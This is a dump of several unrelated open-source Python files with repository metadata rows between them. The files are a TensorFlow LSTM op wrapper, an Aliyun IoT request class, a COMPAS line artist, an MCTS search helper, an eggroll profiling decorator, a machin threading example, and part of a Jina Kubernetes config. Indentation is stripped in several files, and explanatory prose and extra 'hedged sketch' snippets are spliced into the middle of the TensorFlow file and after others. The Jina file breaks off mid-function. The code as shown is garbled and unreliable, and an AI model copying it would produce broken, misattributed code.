"LSTMBlockCell", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellOutput._make(_result)
return _result
_ops.RegisterShape("LSTMBlockCell")(None)
_lstm_block_cell_grad_outputs = ["cs_prev_grad", "dicfo", "wci_grad",
"wcf_grad", "wco_grad"]
_LSTMBlockCellGradOutput = _collections.namedtuple(
"LSTMBlockCellGrad", _lstm_block_cell_grad_outputs)
@tf_export('lstm_block_cell_grad')
def lstm_block_cell_grad(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad, use_peephole, name=None):
r"""Computes the LSTM cell backward propagation for 1 timestep.
  This implementation is to be used in conjunction with LSTMBlockCell.
Args:
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The input to the LSTM cell, shape (batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
The previous cell state.
h_prev: A `Tensor`. Must have the same type as `x`. The previous h state.
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
i: A `Tensor`. Must have the same type as `x`. The input gate.
cs: A `Tensor`. Must have the same type as `x`.
The cell state before the tanh.
f: A `Tensor`. Must have the same type as `x`. The forget gate.
o: A `Tensor`. Must have the same type as `x`. The output gate.
ci: A `Tensor`. Must have the same type as `x`. The cell input.
co: A `Tensor`. Must have the same type as `x`. The cell after the tanh.
cs_grad: A `Tensor`. Must have the same type as `x`.
The current gradient of cs.
h_grad: A `Tensor`. Must have the same type as `x`.
The gradient of h vector.
use_peephole: A `bool`. Whether the cell uses peephole connections.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (cs_prev_grad, dicfo, wci_grad, wcf_grad, wco_grad).
    cs_prev_grad: A `Tensor`. Has the same type as `x`. The gradient of cs_prev to be back-propped.
    dicfo: A `Tensor`. Has the same type as `x`. The derivative with respect to [i, ci, f, o].
wci_grad: A `Tensor`. Has the same type as `x`. The gradient for wci to be back-propped.
wcf_grad: A `Tensor`. Has the same type as `x`. The gradient for wcf to be back-propped.
wco_grad: A `Tensor`. Has the same type as `x`. The gradient for wco to be back-propped.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"LSTMBlockCellGrad", x=x, cs_prev=cs_prev, h_prev=h_prev, w=w,
wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f, o=o, ci=ci, co=co,
cs_grad=cs_grad, h_grad=h_grad, use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("use_peephole", _op.get_attr("use_peephole"), "T",
_op.get_attr("T"))
_execute.record_gradient(
"LSTMBlockCellGrad", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"LSTMBlockCellGrad", name, _ctx._post_execution_callbacks, x, cs_prev,
h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad,
"use_peephole", use_peephole)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
except _core._FallbackException:
return lstm_block_cell_grad_eager_fallback(
x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co,
cs_grad, h_grad, use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def lstm_block_cell_grad_eager_fallback(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad, use_peephole, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function lstm_block_cell_grad
"""
_ctx = ctx if ctx else _context.context()
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad) = _inputs_T
_inputs_flat = [x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad]
_attrs = ("use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"LSTMBlockCellGrad", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"LSTMBlockCellGrad", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
_ops.RegisterShape("LSTMBlockCellGrad")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
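The commented block below and the byte string passed to `_InitOpDefLibrary` at the bottom of this file carry the same information: the bytes are a serialized `OpList` proto. A small sketch to decode it:

```python
# Hedged sketch: decode the serialized OpList that this module registers.
from tensorflow.core.framework import op_def_pb2

def op_names(op_list_proto_bytes):
    op_list = op_def_pb2.OpList()
    op_list.ParseFromString(op_list_proto_bytes)
    return [op.name for op in op_list.op]

# For the bytes at the bottom of this file this should yield:
# ['BlockLSTM', 'BlockLSTMGrad', 'LSTMBlockCell', 'LSTMBlockCellGrad']
```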
# op {
# name: "BlockLSTM"
# input_arg {
# name: "seq_len_max"
# type: DT_INT64
# }
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# output_arg {
# name: "i"
# type_attr: "T"
# }
# output_arg {
# name: "cs"
# type_attr: "T"
# }
# output_arg {
# name: "f"
# type_attr: "T"
# }
# output_arg {
# name: "o"
# type_attr: "T"
# }
# output_arg {
# name: "ci"
# type_attr: "T"
# }
# output_arg {
# name: "co"
# type_attr: "T"
# }
# output_arg {
# name: "h"
# type_attr: "T"
# }
# attr {
# name: "forget_bias"
# type: "float"
# default_value {
# f: 1
# }
# }
# attr {
# name: "cell_clip"
# type: "float"
# default_value {
# f: 3
# }
# }
# attr {
# name: "use_peephole"
# type: "bool"
# default_value {
# b: false
# }
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
# op {
# name: "BlockLSTMGrad"
# input_arg {
# name: "seq_len_max"
# type: DT_INT64
# }
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# input_arg {
# name: "i"
# type_attr: "T"
# }
# input_arg {
# name: "cs"
# type_attr: "T"
# }
# input_arg {
# name: "f"
# type_attr: "T"
# }
# input_arg {
# name: "o"
# type_attr: "T"
# }
# input_arg {
# name: "ci"
# type_attr: "T"
# }
# input_arg {
# name: "co"
# type_attr: "T"
# }
# input_arg {
# name: "h"
# type_attr: "T"
# }
# input_arg {
# name: "cs_grad"
# type_attr: "T"
# }
# input_arg {
# name: "h_grad"
# type_attr: "T"
# }
# output_arg {
# name: "x_grad"
# type_attr: "T"
# }
# output_arg {
# name: "cs_prev_grad"
# type_attr: "T"
# }
# output_arg {
# name: "h_prev_grad"
# type_attr: "T"
# }
# output_arg {
# name: "w_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wci_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wcf_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wco_grad"
# type_attr: "T"
# }
# output_arg {
# name: "b_grad"
# type_attr: "T"
# }
# attr {
# name: "use_peephole"
# type: "bool"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
# op {
# name: "LSTMBlockCell"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# output_arg {
# name: "i"
# type_attr: "T"
# }
# output_arg {
# name: "cs"
# type_attr: "T"
# }
# output_arg {
# name: "f"
# type_attr: "T"
# }
# output_arg {
# name: "o"
# type_attr: "T"
# }
# output_arg {
# name: "ci"
# type_attr: "T"
# }
# output_arg {
# name: "co"
# type_attr: "T"
# }
# output_arg {
# name: "h"
# type_attr: "T"
# }
# attr {
# name: "forget_bias"
# type: "float"
# default_value {
# f: 1
# }
# }
# attr {
# name: "cell_clip"
# type: "float"
# default_value {
# f: 3
# }
# }
# attr {
# name: "use_peephole"
# type: "bool"
# default_value {
# b: false
# }
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
# op {
# name: "LSTMBlockCellGrad"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# input_arg {
# name: "i"
# type_attr: "T"
# }
# input_arg {
# name: "cs"
# type_attr: "T"
# }
# input_arg {
# name: "f"
# type_attr: "T"
# }
# input_arg {
# name: "o"
# type_attr: "T"
# }
# input_arg {
# name: "ci"
# type_attr: "T"
# }
# input_arg {
# name: "co"
# type_attr: "T"
# }
# input_arg {
# name: "cs_grad"
# type_attr: "T"
# }
# input_arg {
# name: "h_grad"
# type_attr: "T"
# }
# output_arg {
# name: "cs_prev_grad"
# type_attr: "T"
# }
# output_arg {
# name: "dicfo"
# type_attr: "T"
# }
# output_arg {
# name: "wci_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wcf_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wco_grad"
# type_attr: "T"
# }
# attr {
# name: "use_peephole"
# type: "bool"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n\215\002\n\tBlockLSTM\022\017\n\013seq_len_max\030\t\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\032\006\n\001i\"\001T\032\007\n\002cs\"\001T\032\006\n\001f\"\001T\032\006\n\001o\"\001T\032\007\n\002ci\"\001T\032\007\n\002co\"\001T\032\006\n\001h\"\001T\"\033\n\013forget_bias\022\005float\032\005%\000\000\200?\"\031\n\tcell_clip\022\005float\032\005%\000\000@@\"\030\n\014use_peephole\022\004bool\032\002(\000\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\351\002\n\rBlockLSTMGrad\022\017\n\013seq_len_max\030\t\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\022\006\n\001i\"\001T\022\007\n\002cs\"\001T\022\006\n\001f\"\001T\022\006\n\001o\"\001T\022\007\n\002ci\"\001T\022\007\n\002co\"\001T\022\006\n\001h\"\001T\022\014\n\007cs_grad\"\001T\022\013\n\006h_grad\"\001T\032\013\n\006x_grad\"\001T\032\021\n\014cs_prev_grad\"\001T\032\020\n\013h_prev_grad\"\001T\032\013\n\006w_grad\"\001T\032\r\n\010wci_grad\"\001T\032\r\n\010wcf_grad\"\001T\032\r\n\010wco_grad\"\001T\032\013\n\006b_grad\"\001T\"\024\n\014use_peephole\022\004bool\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\200\002\n\rLSTMBlockCell\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\032\006\n\001i\"\001T\032\007\n\002cs\"\001T\032\006\n\001f\"\001T\032\006\n\001o\"\001T\032\007\n\002ci\"\001T\032\007\n\002co\"\001T\032\006\n\001h\"\001T\"\033\n\013forget_bias\022\005float\032\005%\000\000\200?\"\031\n\tcell_clip\022\005float\032\005%\000\000@@\"\030\n\014use_peephole\022\004bool\032\002(\000\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\247\002\n\021LSTMBlockCellGrad\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\022\006\n\001i\"\001T\022\007\n\002cs\"\001T\022\006\n\001f\"\001T\022\006\n\001o\"\001T\022\007\n\002ci\"\001T\022\007\n\002co\"\001T\022\014\n\007cs_grad\"\001T\022\013\n\006h_grad\"\001T\032\021\n\014cs_prev_grad\"\001T\032\n\n\005dicfo\"\001T\032\r\n\010wci_grad\"\001T\032\r\n\010wcf_grad\"\001T\032\r\n\010wco_grad\"\001T\"\024\n\014use_peephole\022\004bool\"\021\n\001T\022\004type:\006\n\0042\002\023\001")
avg_line_length: 36.591667 | max_line_length: 2,646 | alphanum_fraction: 0.624488
790dd5c09d0dc1c89b8d4a0593284a76bc85748f | 3,042 | py | Python | aliyun-python-sdk-iot/aliyunsdkiot/request/v20180120/CreateRuleRequest.py | liuzheng/aliyun-openapi-python-sdk | 1ba6743f3d6f2cef57ec9e3be1754b04293c3150 | ["Apache-2.0"] | stars: null | issues: null | forks: null
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkiot.endpoint import endpoint_data
class CreateRuleRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Iot', '2018-01-20', 'CreateRule')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
	def get_Select(self):
		return self.get_query_params().get('Select')
	def set_Select(self, Select):
		self.add_query_param('Select', Select)
	def get_RuleDesc(self):
		return self.get_query_params().get('RuleDesc')
	def set_RuleDesc(self, RuleDesc):
		self.add_query_param('RuleDesc', RuleDesc)
	def get_ShortTopic(self):
		return self.get_query_params().get('ShortTopic')
	def set_ShortTopic(self, ShortTopic):
		self.add_query_param('ShortTopic', ShortTopic)
	def get_ResourceGroupId(self):
		return self.get_query_params().get('ResourceGroupId')
	def set_ResourceGroupId(self, ResourceGroupId):
		self.add_query_param('ResourceGroupId', ResourceGroupId)
	def get_DataType(self):
		return self.get_query_params().get('DataType')
	def set_DataType(self, DataType):
		self.add_query_param('DataType', DataType)
	def get_IotInstanceId(self):
		return self.get_query_params().get('IotInstanceId')
	def set_IotInstanceId(self, IotInstanceId):
		self.add_query_param('IotInstanceId', IotInstanceId)
	def get_Where(self):
		return self.get_query_params().get('Where')
	def set_Where(self, Where):
		self.add_query_param('Where', Where)
	def get_TopicType(self):
		return self.get_query_params().get('TopicType')
	def set_TopicType(self, TopicType):
		self.add_query_param('TopicType', TopicType)
	def get_ProductKey(self):
		return self.get_query_params().get('ProductKey')
	def set_ProductKey(self, ProductKey):
		self.add_query_param('ProductKey', ProductKey)
	def get_Name(self):
		return self.get_query_params().get('Name')
	def set_Name(self, Name):
		self.add_query_param('Name', Name)
	def get_Topic(self):
		return self.get_query_params().get('Topic')
	def set_Topic(self, Topic):
		self.add_query_param('Topic', Topic)
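A hedged usage sketch for this request class; the client construction and `do_action_with_exception` call follow the usual aliyunsdkcore pattern, and every credential and rule value below is a placeholder:

```python
# Hedged usage sketch: create an IoT rule via the request class above.
from aliyunsdkcore.client import AcsClient

client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-shanghai')
request = CreateRuleRequest()
request.set_Name('temperature_alert')
request.set_ProductKey('<productKey>')
request.set_Select('deviceName() as deviceName, items.temperature.value as temperature')
request.set_Where('temperature > 38')
request.set_Topic('thing/event/property/post')
response = client.do_action_with_exception(request)
print(response)
```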
avg_line_length: 31.040816 | max_line_length: 74 | alphanum_fraction: 0.753123
790dd60430b6b1e8b7c79bdda4a8bfebf564e295 | 3,307 | py | Python | src/compas_rhino/artists/lineartist.py | archimarkGit/compas | a953df2fca778e27bdf02437fcf8ff2b7d924c73 | ["MIT"] | stars: null | issues: null | forks: null
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import compas_rhino
from compas.utilities import iterable_like
from compas_rhino.artists._primitiveartist import PrimitiveArtist
__all__ = ['LineArtist']
class LineArtist(PrimitiveArtist):
"""Artist for drawing lines.
Parameters
----------
primitive : :class:`compas.geometry.Line`
A COMPAS line.
Notes
-----
See :class:`compas_rhino.artists.PrimitiveArtist` for all other parameters.
"""
def draw(self):
"""Draw the line.
Returns
-------
list
The GUIDs of the created Rhino objects.
"""
start = list(self.primitive.start)
end = list(self.primitive.end)
lines = [{'start': start, 'end': end, 'color': self.color, 'name': self.name}]
guids = compas_rhino.draw_lines(lines, layer=self.layer, clear=False, redraw=False)
self._guids = guids
return guids
@staticmethod
def draw_collection(collection, names=None, colors=None, layer=None, clear=False, add_to_group=False, group_name=None):
"""Draw a collection of lines.
Parameters
----------
collection: list of compas.geometry.Line
A collection of ``Line`` objects.
names : list of str, optional
Individual names for the lines.
colors : color or list of color, optional
A color specification for the lines as a single color or a list of individual colors.
layer : str, optional
A layer path.
clear : bool, optional
Clear the layer before drawing.
add_to_group : bool, optional
Add the frames to a group.
group_name : str, optional
Name of the group.
Returns
-------
guids: list
A list of GUIDs if the collection is not grouped.
groupname: str
The name of the group if the collection objects are grouped.
"""
lines = [{'start': list(line[0]), 'end': list(line[1])} for line in collection]
if colors:
if isinstance(colors[0], (int, float)):
colors = iterable_like(collection, [colors], colors)
else:
colors = iterable_like(collection, colors, colors[0])
for line, rgb in zip(lines, colors):
line['color'] = rgb
if names:
if isinstance(names, basestring):
names = iterable_like(collection, [names], names)
else:
names = iterable_like(collection, names, names[0])
for line, name in zip(lines, names):
line['name'] = name
guids = compas_rhino.draw_lines(lines, layer=layer, clear=clear)
if not add_to_group:
return guids
group = compas_rhino.rs.AddGroup(group_name)
if group:
compas_rhino.rs.AddObjectsToGroup(guids, group)
return group
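A hedged usage sketch for `draw_collection` (intended to run inside Rhino, where `compas_rhino` can reach the document; the geometry and layer names are arbitrary examples):

```python
# Hedged usage sketch: draw two colored axes and group them.
from compas.geometry import Line

axes = [Line([0, 0, 0], [5, 0, 0]), Line([0, 0, 0], [0, 5, 0])]
group = LineArtist.draw_collection(
    axes,
    names=['x-axis', 'y-axis'],
    colors=[(255, 0, 0), (0, 255, 0)],
    layer='COMPAS::Axes',
    clear=True,
    add_to_group=True,
    group_name='axes',
)
```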
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
avg_line_length: 30.62037 | max_line_length: 123 | alphanum_fraction: 0.566979
790dd6370c24d19ef81de7752b882b6cd395e555 | 1,901 | py | Python | Version2/ivan/rlcard/rlcard/agents/mcmphelp.py | guy477/Poker | d10e5af396509cd425aedc27198bb30c0709f43b | ["MIT"] | stars: 2 (2021-05-03T01:57:06.000Z to 2022-03-30T02:56:11.000Z) | issues: null (path: ignitionBot/ivan/rlcard/rlcard/agents/mcmphelp.py) | forks: 1 (2021-02-17T06:17:37.000Z, path: ignitionBot/ivan/rlcard/rlcard/agents/mcmphelp.py)
import random
def par_UCT(rootstate, rootnode, itermax, verbose=False):
    for i in range(itermax):
        node = rootnode
        state = rootstate.clone()
        # Select
        while node.untriedMoves == [] and node.childNodes != []: # node is fully expanded and non-terminal
            node = node.UCTSelectChild()
            state.do_move(node.move)
        # Expand
        if node.untriedMoves != []: # if we can expand (i.e. state/node is non-terminal)
            m = random.choice(node.untriedMoves)
            state.do_move(m)
            node = node.AddChild(m, state) # add child and descend tree
        # Rollout - this can often be made orders of magnitude quicker using a state.GetRandomMove() function
        while state.get_moves() != []: # while state is non-terminal
            state.do_move(random.choice(state.get_moves()))
        # Backpropagate
        while node is not None: # backpropagate from the expanded node and work back to the root node
            node.Update(state.get_result(node.playerJustMoved)) # state is terminal. Update node with result from POV of node.playerJustMoved
            node = node.parentNode
    # Output some information about the tree - can be omitted
    if verbose:
        print(rootnode.TreeToString(0))
    # determine general performance of hand: return the most-visited move
    return sorted(rootnode.childNodes, key=lambda c: c.visits)[-1].move
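The node API used above (`UCTSelectChild`, `AddChild`, `Update`) is not defined in this file; conventionally `UCTSelectChild` applies the UCB1 rule. A hedged sketch of that rule, under the assumption that nodes track `wins` and `visits` counters:

```python
# Hedged sketch of the UCB1 rule UCTSelectChild is conventionally assumed to apply.
import math

def ucb1_score(child_wins, child_visits, parent_visits, c=math.sqrt(2)):
    exploit = child_wins / child_visits                             # average reward so far
    explore = c * math.sqrt(math.log(parent_visits) / child_visits) # optimism bonus
    return exploit + explore

# Selection then descends to the child maximizing ucb1_score(...).
```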
avg_line_length: 44.209302 | max_line_length: 145 | alphanum_fraction: 0.557601
790dd65a065516ff8e7ef93065f71014e83c9436 | 1,905 | py | Python | python/eggroll/core/aspects.py | liszekei/eggroll | 6a8cc5e1c9106d2633dc415092151f921f003743 | ["Apache-2.0"] | stars: 209 (2019-08-08T18:38:26.000Z to 2022-03-23T06:20:40.000Z) | issues: 110 (2019-08-09T02:50:47.000Z to 2022-03-07T10:30:21.000Z) | forks: 77 (2019-08-15T08:11:52.000Z to 2022-03-23T06:19:44.000Z)
# Copyright (c) 2019 - now, Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import inspect
from time import time, perf_counter
from eggroll.utils.log_utils import get_logger
L = get_logger(filename='profile')
def _method_profile_logger(func):
def wrapper(*args, **kwargs):
start_wall_time = time()
start_cpu_time = perf_counter()
result = func(*args, **kwargs)
end_wall_time = time()
end_cpu_time = perf_counter()
code = func.__code__
try:
outerframes = inspect.getouterframes(inspect.currentframe(), 2)
real_caller = outerframes[1]
L.trace(f'{{"metric_type": "func_profile", '
f'"qualname": "{func.__qualname__}", '
f'"caller": "{real_caller.filename.rsplit("/", 1)[-1]}:{real_caller.lineno}", '
f'"cpu_time": {end_cpu_time - start_cpu_time}, '
f'"wall_time": {end_wall_time - start_wall_time}}}')
return result
except Exception as e:
L.trace(f'{{"metric_type": "func_profile", '
f'"qualname": "{func.__qualname__}", '
f'"caller": "unknown", '
f'"cpu_time": {end_cpu_time - start_cpu_time}, '
f'"wall_time": {end_wall_time - start_wall_time}}}')
return wrapper
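A hedged usage sketch: any function wrapped with the decorator above emits one structured trace line per call (the function below is a stand-in, not part of eggroll):

```python
# Hedged usage sketch for the profiling decorator above.
@_method_profile_logger
def merge_sorted(a, b):
    return sorted(a + b)

merge_sorted(list(range(500)), list(range(500)))
# -> logs {"metric_type": "func_profile", "qualname": "merge_sorted", ...}
```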
avg_line_length: 35.943396 | max_line_length: 98 | alphanum_fraction: 0.623097
790dd66ed1fd5503977ff280cc651f855ea31907 | 501 | py | Python | examples/tutorials/parallel_distributed/mth_exception.py | lethaiq/machin | 7873cada457328952310394afeedcad4bb6a7c4a | ["MIT"] | stars: 1 (2021-04-01T21:21:23.000Z) | issues: null | forks: null
from machin.parallel.thread import Thread, ThreadException
import time
def test1():
time.sleep(1)
print("Exception occurred at {}".format(time.time()))
raise RuntimeError("Error")
if __name__ == "__main__":
t1 = Thread(target=test1)
t1.start()
while True:
try:
t1.watch()
except ThreadException as e:
print("Exception caught at {}".format(time.time()))
print("Exception is: {}".format(e))
break
t1.join()
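One caveat with the loop above is that it spins at full speed between `watch()` calls. A hedged variant that sleeps between polls; it assumes machin's `Thread` keeps `threading.Thread.is_alive`, which is not shown in this example:

```python
# Hedged variant: poll watch() with a small sleep instead of busy-waiting.
while t1.is_alive():
    try:
        t1.watch()
    except ThreadException as e:
        print("Exception caught at {}".format(time.time()))
        break
    time.sleep(0.05)
```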
avg_line_length: 22.772727 | max_line_length: 63 | alphanum_fraction: 0.590818
790dd67805d984f9cd1a0d14782011a31fbc0274 | 14,858 | py | Python | jina/orchestrate/deployments/config/k8s.py | gauribhutani/jina | e1e23643f8260e6917d9704b63edc54bcebbc7e9 | ["Apache-2.0"] | stars: null | issues: 1 (2022-03-08T18:46:28.000Z to 2022-03-08T18:47:24.000Z) | forks: 1 (2022-03-17T04:50:07.000Z, via kuraakhilesh8230/jina @ 7cc23944fcdfd9944dc805ce8a116818d45317ee)
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
"""
Class that implements the output of configuration files for Kubernetes for a given Deployment.
"""
class _K8sDeployment:
def __init__(
self,
name: str,
version: str,
pod_type: PodRoleType,
jina_deployment_name: str,
shard_id: Optional[int],
common_args: Union['Namespace', Dict],
deployment_args: Union['Namespace', Dict],
k8s_namespace: str,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
self.name = name
self.dns_name = to_compatible_name(name)
self.version = version
self.pod_type = pod_type
self.jina_deployment_name = jina_deployment_name
self.shard_id = shard_id
self.common_args = common_args
self.deployment_args = deployment_args
self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
def get_gateway_yamls(
self,
) -> List[Dict]:
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-standard'
)
cargs = copy.copy(self.deployment_args)
cargs.env = None
cargs.deployments_addresses = self.k8s_deployments_addresses
from jina.helper import ArgNamespace
from jina.parsers import set_gateway_parser
taboo = {
'uses_with',
'uses_metas',
'volumes',
'uses_before',
'uses_after',
'workspace',
'workspace_id',
'upload_files',
'noblock_on_start',
}
non_defaults = ArgNamespace.get_non_defaults_args(
cargs, set_gateway_parser(), taboo=taboo
)
_args = ArgNamespace.kwargs2list(non_defaults)
container_args = ['gateway'] + _args
if not cargs.k8s_connection_pool:
container_args.append('--k8s-disable-connection-pool')
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
container_cmd='["jina"]',
container_args=f'{container_args}',
replicas=1,
pull_policy='IfNotPresent',
jina_deployment_name='gateway',
pod_type=self.pod_type,
port=self.common_args.port,
env=cargs.env,
)
def _get_image_name(self, uses: Optional[str]):
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-perf'
)
if uses is not None and uses != __default_executor__:
image_name = get_image_name(uses)
return image_name
def _get_container_args(self, cargs, pod_type):
uses_metas = cargs.uses_metas or {}
uses_with = self.deployment_args.uses_with
if cargs.uses != __default_executor__:
